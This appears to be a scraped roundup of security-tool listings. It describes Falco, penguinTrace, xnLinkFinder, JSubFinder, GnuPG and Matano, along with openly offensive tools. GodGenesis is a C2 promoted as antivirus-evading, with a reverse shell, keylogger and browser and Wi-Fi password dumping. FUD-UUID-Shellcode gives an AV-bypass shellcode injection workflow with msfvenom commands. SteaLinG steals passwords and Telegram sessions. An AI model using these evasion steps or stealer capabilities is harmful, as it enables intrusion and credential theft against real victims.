Falco 0.33.0

Sysdig Falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think of Falco as a mix of snort, ossec and strace.

PenguinTrace - Tool To Show How Code Runs At The Hardware Level


penguinTrace is intended to help build an understanding of how programs run at the hardware level. It provides a way to see what instructions compile to, and then step through those instructions and see how they affect machine state as well as how this maps back to variables in the original program. A bit more background is available on the website.

penguinTrace starts a web-server which provides a web interface to edit and run code. Code can be developed in C, C++ or Assembly. The resulting assembly is then displayed and can then be stepped through, with the values of hardware registers and variables in the current scope shown.

penguinTrace runs on Linux and supports the AMD64/X86-64 and AArch64 architectures. penguinTrace can run on other operating systems using Docker, a virtual machine or through the Windows Subsystem for Linux (WSL).


The primary goal of penguinTrace is to allow exploring how programs execute on a processor; however, its development also provided an opportunity to explore how debuggers work and some lower-level details of interaction with the kernel.

Note: penguinTrace allows running arbitrary code as part of its design. By default it will only listen for connections from the local machine. It should only be configured to listen for remote connections on a trusted network and should not be exposed to the internet. This can be mitigated by running penguinTrace in a container, and a limited degree of isolation of stepped code can be provided when libcap is available.

Getting Started

Prerequisites

penguinTrace requires 64-bit Linux running on a X86-64 or AArch64 processor. It can also run on a Raspberry Pi running a 64-bit (AArch64) Linux distribution. For other operating systems, it can be run on Windows 10 using the Windows Subsystem for Linux (WSL) or in a Docker container. WSL does not support tracee process isolation.

python
clang
llvm
llvm-dev
libclang-dev
libcap-dev # For containment

Building

To build penguinTrace outside of a container, clone the repository and run make. The binaries will be placed in build/bin by default.

To build penguinTrace in Docker, run docker build -t penguintrace github.com/penguintrace/penguintrace.
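
As a rough sketch, a local (non-container) build might look like the following, assuming the repository URL used in the Docker example above:

git clone https://github.com/penguintrace/penguintrace.git
cd penguintrace
make
# binaries are placed in build/bin by default
./build/bin/penguintrace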

Running

Once penguinTrace is built, running the penguintrace binary will start the server.

If built in a container it can then be run with docker run -it -p 127.0.0.1:8080:8080 --tmpfs /tmp:exec --cap-add=SYS_PTRACE --cap-add=SYS_ADMIN --rm --security-opt apparmor=unconfined penguintrace penguintrace. See Containers for details on better isolating the container.

Then navigate to 127.0.0.1:8080 or localhost:8080 to access the web interface.

Note: In order to run on port 80, you can modify the docker run command to map from port 8080 to port 80, e.g. -p 127.0.0.1:80:8080.
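
For example, the Docker command from above with only the host port mapping changed to 80:

docker run -it -p 127.0.0.1:80:8080 --tmpfs /tmp:exec --cap-add=SYS_PTRACE --cap-add=SYS_ADMIN --rm --security-opt apparmor=unconfined penguintrace penguintrace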

If built locally, you can modify the binary to allow it to bind to port 80 with sudo setcap CAP_NET_BIND_SERVICE=+ep penguintrace. It can then be run with penguintrace -c SERVER_PORT 80.
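
As a minimal sketch of those two steps, assuming the binary was built into build/bin as described above:

sudo setcap CAP_NET_BIND_SERVICE=+ep ./build/bin/penguintrace
./build/bin/penguintrace -c SERVER_PORT 80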

penguinTrace defaults to port 8080 as it is intended to be run as an unprivileged user.

Temporary Files

The penguinTrace server uses the system temporary directory as a location for compiled binaries and environments for running traced processes. If the PENGUINTRACE_TMPDIR environment variable is defined, this directory will be used. It will fall back to the TMPDIR environment variable and finally the directories specified in the C library.

This must correspond to a directory that does not have noexec set; if running in a container, the filesystem is likely to have this set by default.
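
For example, a sketch of pointing penguinTrace at a custom, exec-capable temporary directory (the path here is hypothetical):

mkdir -p /opt/penguintrace-tmp
PENGUINTRACE_TMPDIR=/opt/penguintrace-tmp ./build/bin/penguintrace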

Networking

By default penguinTrace only listens on the loopback device and IPv4. If the server is configured to listen on all addresses, then also setting the server to IPv6 will allow connections on both IPv4 and IPv6; this is the default mode when running in a Docker container.

This is because penguinTrace only creates a single thread to listen to connections and so can currently only bind to a single address or all addresses.

Session Handling

By default penguinTrace runs in multiple session mode: each time code is compiled, a new session is created. The URL fragment (after the '#') of the UI is updated with the session id, and this URL can be used to reconnect to the same session.

If running in single session mode, each penguinTrace instance only supports a single debugging instance. The web UI will automatically reconnect to a previous session. To support multiple sessions, launch multiple instances listening on different ports, as sketched below.
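
As a sketch, two independent instances on different ports, reusing the -c SERVER_PORT syntax shown earlier (any additional option needed to enable single session mode is not shown here):

./build/bin/penguintrace -c SERVER_PORT 8080 &
./build/bin/penguintrace -c SERVER_PORT 8081 &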

Containers

The docker_build.sh and docker_run.sh scripts provide an example of how to run penguinTrace in a Docker container. Dockerfile_noisolate provides an alternative way of running that does not require the SYS_ADMIN capability but provides less isolation between the server and the traced processes. The SYS_PTRACE capability is always required for the server to trace processes. misc/apparmor-profile provides an example AppArmor profile that is suitable for running penguinTrace but may need some customisation for the location of temporary directories and compilers.

AArch64 / Raspberry Pi

penguinTrace will only run under a 64-bit operating system. The official operating systems provided for the Raspberry Pi are all 32-bit; to run penguinTrace, a 64-bit distribution such as pi64 or Arch Linux Arm is required.

Full instructions for setting up a 64-bit OS on Raspberry Pi TBD.

Authors

penguinTrace is developed by Alex Beharrell.

License

This project is licensed under the GNU AGPL. A non-permissive open source license is chosen as the intention of this project is educational, and so any derivative works should have the source available so that people can learn from it.

The bundling of the source code relies on the structure of the repository. Derivative works that are not forked from a penguinTrace repository will need to modify the Makefile rules for static/source.tar.gz to ensure the modified source is correctly distributed.

Acknowledgements

penguinTrace makes use of jQuery and CodeMirror for some aspects of the web interface. Both are licensed under the MIT License. It also uses the Major Mono font which is licensed under the Open Font License.



xnLinkFinder - A Python Tool Used To Discover Endpoints (And Potential Parameters) For A Given Target

About - v2.0

This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:

  • crawling a target (pass a domain/URL)
  • crawling multiple targets (pass a file of domains/URLs)
  • searching files in a given directory (pass a directory name)
  • getting them from a Burp project (pass location of a Burp XML file)
  • getting them from an OWASP ZAP project (pass location of a ZAP ASCII message file)

The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.


Installation

xnLinkFinder supports Python 3.

$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install

Usage

Arg Long Arg Description
-i --input Input: a URL, a text file of URLs, a directory of files to search, a Burp XML output file or an OWASP ZAP output file.
-o --output The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed.
-op --output-params The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed.
-ow --output-overwrite If the output file already exists, it will be overwritten instead of being appended to.
-sp --scope-prefix Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-spo --scope-prefix-original If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false)
-sf --scope-filter Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-c --cookies † Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
-H --headers † Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
-ra --regex-after RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output.
-d --depth † The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix) argument to ensure a request to links found without a domain can be attempted.
-p --processes † Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25)
-x --exclude Additional Link exclusions (to the list in config.yml) in a comma separated list, e.g. careers,forum
-orig --origin Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false)
-t --timeout † How many seconds to wait for the server to send data before giving up (default: 10 seconds)
-inc --include Include input (-i) links in the output (default: false)
-u --user-agent † What User Agents to get links for, e.g. -u desktop mobile
-insecure † Whether TLS certificate checks should be disabled when making requests (default: false)
-s429 † Stop when > 95 percent of responses return 429 Too Many Requests (default: false)
-s403 † Stop when > 95 percent of responses return 403 Forbidden (default: false)
-sTO † Stop when > 95 percent of requests time out (default: false)
-sCE † Stop when > 95 percent of requests have connection errors (default: false)
-m --memory-threshold The memory threshold percentage. If the machine's memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95)
-mfs --max-file-size † The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size is over this, it will be ignored (default: 500 MB). Setting this to 0 means no files will be ignored, regardless of size.
-replay-proxy † For active link finding with URL (or file of URLs), replay the requests through this proxy.
-ascii-only Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason.
-v --verbose Verbose output
-vv --vverbose Increased verbose output
-h --help show the help message and exit

† NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE

config.yml

The config.yml file has the keys which can be updated to suit your needs:

  • linkExclude - A comma separated list of strings (e.g. .css,.jpg,.jpeg etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.
  • contentExclude - A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg etc.) that all responses' Content-Type headers are checked against. Any responses with these content types will be excluded and not checked for links.
  • fileExtExclude - A comma separated list of strings (e.g. .zip,.gz,.tar etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.
  • regexFiles - A list of file types separated by a pipe character (e.g. php|php3|php5 etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
  • respParamLinksFound † - Whether to get potential parameters from links found in responses: True or False
  • respParamPathWords † - Whether to add path words in retrieved links as potential parameters: True or False
  • respParamJSON † - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True or False
  • respParamJSVars † - Whether javascript variables set with var, let or const are added as potential parameters: True or False
  • respParamXML † - If the MIME type of the response contains XML, whether to add XML attributes values as potential parameters: True or False
  • respParamInputField † - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True or False
  • respParamMetaName † - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True or False

† IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True

Examples

Find Links from a specific target - Basic

python3 xnLinkFinder.py -i target.com

Find Links from a specific target - Detailed

Ideally, provide a scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains (this can be a file of in-scope domains). Also, you can pass cookies and custom headers to ensure you find links only available to authorised users. Specifying the User Agent (-u desktop mobile) will first search for all links using desktop User Agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (-d) will keep sending requests to links found at the previous depth to find more links.

python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10

Find Links from a list of URLs - Basic

If you have a file of JS file URLs for example, you can look for links in those:

python3 xnLinkFinder.py -i target_js.txt

Find Links from files in a directory - Basic

If you have files, e.g. JS files, HTTP responses, etc., you can look for links in those:

python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com

NOTE: Sub directories are also checked. The -mfs option can be specified to skip files over a certain size.

Find Links from a Burp project - Basic

In Burp, select the items you want to search (by highlighting the scope, for example), right click and select Save selected items. Ensure that the base64-encode requests and responses option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_burp.xml

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i starts with <?xml then you are trying to process a Burp file.

Find Links from a Burp project - Detailed

Ideally, provide scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains.

python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv

Find Links from an OWASP ZAP project - Basic

In ZAP, select the items you want to search (by highlighting the History, for example), click the Report menu and select Export Messages to File.... This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_zap.txt

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i is in the format ==== 99 ========== for example, then you are trying to process an OWASP ZAP ASCII text file.

Piping to other Tools

You can pipe xnLinkFinder to other tools. Any errors are sent to stderr and any links found are sent to stdout. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:

python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf redbull.* -d 3 | unfurl keys | sort -u

You can also pass the input through stdin instead of -i.

cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf redbull.* -d 3

NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i.

Recommendations and Notes

  • Always use the Scope Prefix argument -sp. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http):
    http://www.target.com
    https://target-payments.com
    https://static.target-cdn.com
    If a link is found that has no domain, e.g. /path/to/example.js, then passing -sp http://www.target.com will result in the output http://www.target.com/path/to/example.js, and if Depth (-d) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains is passed using -sp then the output will include each domain followed by /path/to/example.js and increase the chance of finding more links.
  • If you use -sp but still want the original link of /path/to/example.js (without a domain) additionally returned in the output, then pass the argument -spo.
  • Always use the Scope Filter argument -sf. This will ensure that only relevant domains are returned in the output, and more importantly if Depth (-d) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included):
    target.*
    target-payments.com
    static.target-cdn.com
    THIS IS FOR FILTERING THE LINKS DOMAIN ONLY.
  • If you want to filter the final output in any way, use -ra. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.
  • Use the -v option to have a better idea of what the tool is doing.
  • If you have problems, use the -vv option which may show errors that are occurring, which can possibly be resolved, or you can raise as an issue on github.
  • Pass cookies (-c), headers (-H) and regex (-ra) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
  • Set the -o option to give a specific output file name for Links, rather than the default of output.txt. If you plan on running a large depth of searches, start with 2 with option -v to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow.
  • Set the -op option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt. Any output will be appended to the existing file, unless you pass -ow.
  • If using a high Depth (-d), be wary that some sites use dynamic links, so it will just keep finding new ones. If no new links are being found, then xnLinkFinder will stop searching. Providing the stop flags (-s429, -s403, -sTO, -sCE) should also be considered.
  • If you are finding a large number of links (especially if the Depth (-d) value is high) and have limited resources, the program will stop when it reaches the memory threshold (-m) value and end gracefully with data intact before getting killed.
  • If you decide to cancel xnLinkFinder (using Ctrl-C) in the middle of running, be patient and any gathered data will be saved before ending gracefully.
  • Using the -orig option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but each will be suffixed with the origin URL in square brackets.
  • When making requests, xnLinkFinder will use a random User-Agent from the current group, which defaults to desktop. If you have a target that could have different links for different user agent groups, then specify -u desktop mobile for example (separated with a space). The mobile user agent option is a combination of mobile-apple, mobile-android and mobile-windows.
  • When -i has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs (default: 500 MB) will be skipped.
  • When using the -replay-proxy option, sometimes requests can take longer. If you start seeing more Request Timeout errors (you'll see errors if you use -v or -vv options) then consider using -t to raise the timeout limit.
  • If you know a target will only have ASCII characters in links and parameters then consider passing -ascii-only. This can eliminate a number of false positives that can sometimes get returned from binary data.

Issues

If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv to reproduce the problem and let me know about any error messages that are given.

TODO

  • I seem to have completed all the TODO's I originally had! If you think of any that need adding, let me know

Example output

Active link finding for a domain:

...

Piped input and output:

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)

/XNL-h4ck3r


JSubFinder - Searches Webpages For Javascript And Analyzes Them For Hidden Subdomains And Secrets


JSubFinder is a tool written in Golang to search webpages and JavaScript for hidden subdomains and secrets in the given URL. Developed with bug bounty hunters in mind, JSubFinder takes advantage of Go's performance, allowing it to handle large data sets and be easily chained with other tools.


Install

Install the application and download the signatures needed to find secrets

Using GO:

go get github.com/ThreatUnkown/jsubfinder
wget https://raw.githubusercontent.com/ThreatUnkown/jsubfinder/master/.jsf_signatures.yaml && mv .jsf_signatures.yaml ~/.jsf_signatures.yaml

or

Downloads Page

Basic Usage

Search

Search the given URLs for subdomains and secrets

$ jsubfinder search -h

Execute the command specified

Usage:
JSubFinder search [flags]

Flags:
-c, --crawl Enable crawling
-g, --greedy Check all files for URL's not just Javascript
-h, --help help for search
-f, --inputFile string File containing domains
-t, --threads int Ammount of threads to be used (default 5)
-u, --url strings Url to check

Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console

Examples (results are the same in this case):

$ jsubfinder search -u www.google.com
$ jsubfinder search -f file.txt
$ echo www.google.com | jsubfinder search
$ echo www.google.com | httpx --silent | jsubfinder search

apis.google.com
ogs.google.com
store.google.com
mail.google.com
accounts.google.com
www.google.com
policies.google.com
support.google.com
adservice.google.com
play.google.com

With Secrets Enabled

note --secrets="" will save the secret results in a secrets.txt file

$ echo www.youtube.com | jsubfinder search --secrets=""
www.youtube.com
youtubei.youtube.com
payments.youtube.com
2Fwww.youtube.com
252Fwww.youtube.com
m.youtube.com
tv.youtube.com
music.youtube.com
creatoracademy.youtube.com
artists.youtube.com

Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com

Advanced examples

$ echo www.google.com | jsubfinder search -crawl -s "google_secrets.txt" -S -o jsf_google.txt -t 10 -g
  • -crawl use the default crawler to crawl pages for other URL's to analyze
  • -s enables JSubFinder to search for secrets
  • -S Silence output to console
  • -o <file> save output to specified file
  • -t 10 use 10 threads
  • -g search every URL for JS, even ones we don't think have any

Proxy

Enables the upstream HTTP proxy with TLS MITM support. This allows you to:

  1. Browse sites in real time and have JSubFinder search for subdomains and secrets as you go.
  2. If needed, run JSubFinder on another server to offload the workload
$ JSubFinder proxy -h

Execute the command specified

Usage:
JSubFinder proxy [flags]

Flags:
-h, --help help for proxy
-p, --port int Port for the proxy to listen on (default 8444)
--scope strings Url's in scope seperated by commas. e.g www.google.com,www.netflix.com
-u, --upstream-proxy string Adress of upsteam proxy e.g http://127.0.0.1:8888 (default "http://127.0.0.1:8888")

Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console
$ jsubfinder proxy
Proxy started on :8444
Subdomain: out.reddit.com
Subdomain: www.reddit.com
Subdomain: 2Fwww.reddit.com
Subdomain: alb.reddit.com
Subdomain: about.reddit.com

With Burp Suite

  1. Configure Burp Suite to forward traffic to an upstream proxy (User Options > Connections > Upstream Proxy Servers > Add)
  2. Run JSubFinder in proxy mode

Burp Suite will now forward all traffic proxied through it to JSubFinder. JSubFinder will retrieve the response, return it to Burp, and in another thread search it for subdomains and secrets.

With Proxify

  1. Launch Proxify & dump traffic to a folder proxify -output logs
  2. Configure Burp Suite, a Browser or other tool to forward traffic to Proxify (see instructions on their github page)
  3. Launch JSubFinder in proxy mode & set the upstream proxy as Proxify jsubfinder proxy -u http://127.0.0.1:8443
  4. Use Proxify's replay utility to replay the dumped traffic to jsubfinder replay -output logs -burp-addr http://127.0.0.1:8444

Run on another server

Simple: run JSubFinder in proxy mode on another server, e.g. 192.168.1.2. Follow the proxy steps above but set your application's upstream proxy to 192.168.1.2:8443.
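
A minimal sketch, assuming JSubFinder listens on 192.168.1.2:8443 as in the description above (the target URL is only an example):

# on the remote server (192.168.1.2)
jsubfinder proxy -p 8443 -o jsf_remote.txt

# on your workstation, send traffic through the remote instance, e.g. with curl
curl -x http://192.168.1.2:8443 https://www.example.com/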

Advanced Examples

$ jsubfinder proxy --scope www.reddit.com -p 8081 -S -o jsf_reddit.txt
  • --scope limits JSubFinder to only analyze responses from www.reddit.com
  • -p port JSubFinder's proxy server is running on
  • -S silence output to the console/stdout
  • -o <file> output examples to this file


GNU Privacy Guard 2.3.8

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions.
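
For example, a minimal sketch of everyday GnuPG usage (the recipient and file names are hypothetical):

gpg --full-generate-key                                  # create a key pair
gpg --encrypt --recipient alice@example.org report.txt   # writes report.txt.gpg
gpg --detach-sign report.txt                             # writes report.txt.sig
gpg --verify report.txt.sig report.txt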

GNU Privacy Guard 2.2.40

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions. This is the LTS release.

GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints

God Genesis is a C2 server purely coded in Python3, created to help Red Teamers and Penetration Testers. Currently it only supports a TCP reverse shell, but wait a minute: it is FUD and can give you an admin shell from any targeted Windows machine.


The List Of Commands It Supports :-

===================================================================================================
BASIC COMMANDS:
===================================================================================================
help --> Show This Options
terminate --> Exit The Shell Completely
exit --> Shell Works In Background And Prompted To C2 Server
clear --> Clear The Previous Outputs

===================================================================================================
SYSTEM COMMANDS:
===================================================================================================
cd --> Change Directory
pwd --> Prints Current Working Directory
mkdir *dir_name* --> Creates A Directory Mentioned
rm *dir_name* --> Deletes A Directory Mentioned
powershell [command] --> Run Powershell Command
start *exe_name* --> Start Any Executable By Giving The Executable Name

===================================================================================================
INFORMATION GATHERING COMMANDS:
===================================================================================================
env --> Checks Environment Variables
sc --> Lists All Services Running
user --> Current User
info --> Gives Us All Information About Compromised System
av --> Lists All antivirus In Compromised System

===================================================================================================
DATA EXFILTRATION COMMANDS:
===================================================================================================
download *file_name* --> Download Files From Compromised System
upload *file_name* --> Uploads Files To Victim Pc


===================================================================================================
EXPLOITATION COMMANDS:
===================================================================================================
persistence1 --> Persistence Via Method 1
persistence2 --> Persistence Via Method 2
get --> Download Files From Any URL
chrome_pass_dump --> Dump All Stored Passwords From Chrome Browser
wifi_password --> Dump Passwords Of All Saved Wifi Networks
keylogger --> Starts Key Logging Via Keylogger
dump_keylogger --> Dump All Logs Done By Keylogger
python_install --> Installs Python In Victim Pc Without UI


Features Of Our Framework :-

Check The Video To Get A Detail Knowledge

1. The Payload.py is FULLY UNDETECTABLE (FUD); use your own techniques for making an exe file. (Best Result When Backdoored With Some Other Legitimate Application)
2. Able to perform privilege escalation on any Windows system.
3. FUD keylogger
4. 2 ways of achieving persistence
5. Recon automation to save your time.

How To Use Our Tool :

git clone https://github.com/SaumyajeetDas/GodGenesis.git

pip3 install -r requirements.txt

python3 c2c.py

It is worth mentioning that Suman Chakraborty has contributed to the framework by coding the FUD Keylogger, Wifi Password Extraction and Chrome Password Dumper modules.

Don't Forget To Change The IP ADDRESS Manually in both c2c.py and payload.py



Matano - The Open-Source Security Lake Platform For AWS


Matano is an open source security lake platform for AWS. It lets you ingest petabytes of security and log data from various sources, store and query them in an open Apache Iceberg data lake, and create Python detections as code for realtime alerting. Matano is fully serverless and designed specifically for AWS and focuses on enabling high scale, low cost, and zero-ops. Matano deploys fully into your AWS account.


Features

Collect data from all your sources

Matano lets you collect log data from sources using S3 or SQS based ingestion.

Ingest, transform, normalize log data

Matano normalizes and transforms your data using Vector Remap Language (VRL). Matano works with the Elastic Common Schema (ECS) by default and you can define your own schema.

Store data in S3 object storage

Log data is always stored in S3 object storage, for cost effective, long term, durable storage.

Apache Iceberg Data lake

All data is ingested into an Apache Iceberg based data lake, allowing you to perform ACID transactions, time travel, and more on all your log data. Apache Iceberg is an open table format, so you always own your own data, with no vendor lock-in.

Serverless

Matano is a fully serverless platform, designed for zero-ops and unlimited elastic horizontal scaling.

Detections as code

Write Python detections to implement realtime alerting on your log data.

Installing

View the complete installation instructions.

You can install the matano CLI to deploy Matano into your AWS account, and manage your Matano deployment.

Requirements

  • Docker

Installation

Matano provides a nightly release with the latest prebuilt files to install the Matano CLI on GitHub. You can download and execute these files to install Matano.

For example, to install the Matano CLI for Linux, run:

curl -OL https://github.com/matanolabs/matano/releases/download/nightly/matano-linux-x64.sh
chmod +x matano-linux-x64.sh
sudo ./matano-linux-x64.sh

Getting started

Read the complete docs on getting started.

Deployment

To get started with Matano, run the matano init command. Make sure you have AWS credentials in your environment (or in an AWS CLI profile).
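
For example, a minimal sketch of that first run (the profile name is hypothetical):

export AWS_PROFILE=security-lake
matano init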

The interactive CLI wizard will walk you through getting started by generating an initial Matano directory for you, initializing your AWS account, and deploying Matano into your AWS account.


Initial deployment takes a few minutes.

Documentation

View our complete documentation.

License



FUD-UUID-Shellcode - Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness


Introduction

Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).


How it works

Shellcode generation

  • Firstly, generate a payload in binary format (using either Cobalt Strike or msfvenom). For instance, in msfvenom you can do it like so (the payload I'm using is for illustration purposes; you can use whatever payload you want):

    msfvenom -p windows/messagebox  -f raw -o shellcode.bin
  • Then convert the shellcode (in binary/raw format) into a UUID string format using the Python3 script bin_to_uuid.py:

    ./bin_to_uuid.py -p shellcode.bin > uuid.txt
  • XOR-encrypt the UUID strings in uuid.txt using the Python3 script xor_encryptor.py:

    ./xor_encryptor.py uuid.txt > xor_crypted_out.txt
  • Copy the C-style array in the file, xor_crypted_out.txt, and paste it in the C++ file as an array of unsigned char i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}
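
Putting the generation steps above together as a single shell sketch (the msfvenom payload is illustrative, as noted above):

msfvenom -p windows/messagebox -f raw -o shellcode.bin
./bin_to_uuid.py -p shellcode.bin > uuid.txt
./xor_encryptor.py uuid.txt > xor_crypted_out.txt
# then paste the C-style array from xor_crypted_out.txt into the C++ source:
#   unsigned char payload[]{ ...contents of xor_crypted_out.txt... };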

Execution

This shellcode injection technique comprises the following subsequent steps:

  • First things first, it allocates virtual memory for payload execution and residence via VirtualAlloc
  • It xor decrypts the payload using the xor key value
  • Uses UuidFromStringA to convert UUID strings into their binary representation and store them in the previously allocated memory. This is used to avoid the usage of suspicious APIs like WriteProcessMemory or memcpy.
  • Use EnumChildWindows to execute the payload previously loaded into memory( in step 1 )

What makes it unique?

  • It doesn't use standard functions like memcpy or WriteProcessMemory, which are known to raise alarms to AVs/EDRs; instead, this program uses the Windows API function UuidFromStringA, which can be used to decode data as well as write it to memory (isn't that great, folks? And please don't say "NO!" :) ).
  • It uses the function call obfuscation trick to call the Windows API functions
  • Lastly, because it looks unique :) ( Isn't it? :) )

Important

  • You have to change the XOR key (row 86) to whatever you wish. This can be done in the ./xor_encryptor.py Python3 script by changing the KEY variable.
  • You have to change the default executable filename value (row 90) to your filename.
  • The command for compiling is provided in the C++ file( around the top ). NB: mingw was used but you can use whichever compiler you prefer. :)

Compile

make

Proof-of-Concept( PoC )

Static Analysis

AV Scan results

The binary was scanned using antiscan.me on 01/08/2022.

Credits

https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/



SteaLinG - Open-Source Penetration Testing Framework Designed For Social Engineering


The SteaLinG is an open-source penetration testing framework designed for social engineering. After the hack, you can upload it to the victim's device and run it.

disclaimers:

This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes

How can I benefit from this project?

  • you can use it
  • for developers
    you can read the source code and try to understand how to make a project like this

Features


module Short description
Dump password Steals all saved passwords and uploads the saved-passwords file to Mega
Dump History Dumps browser history
Dump files Steals files from the hard drive with the extension you want

New features

module Short description
1-Telegram Session Hijack Telegram session hijacker
  • How it works? The Telegram session is stored locally in this particular path, C:\Users\<pc name>\AppData\Roaming\Telegram Desktop, in the 'tdata' folder:
C:
└── Users
    ├── .AppData
    │   └── Roaming
    │       └── TelegramDesktop
    │           └── tdata

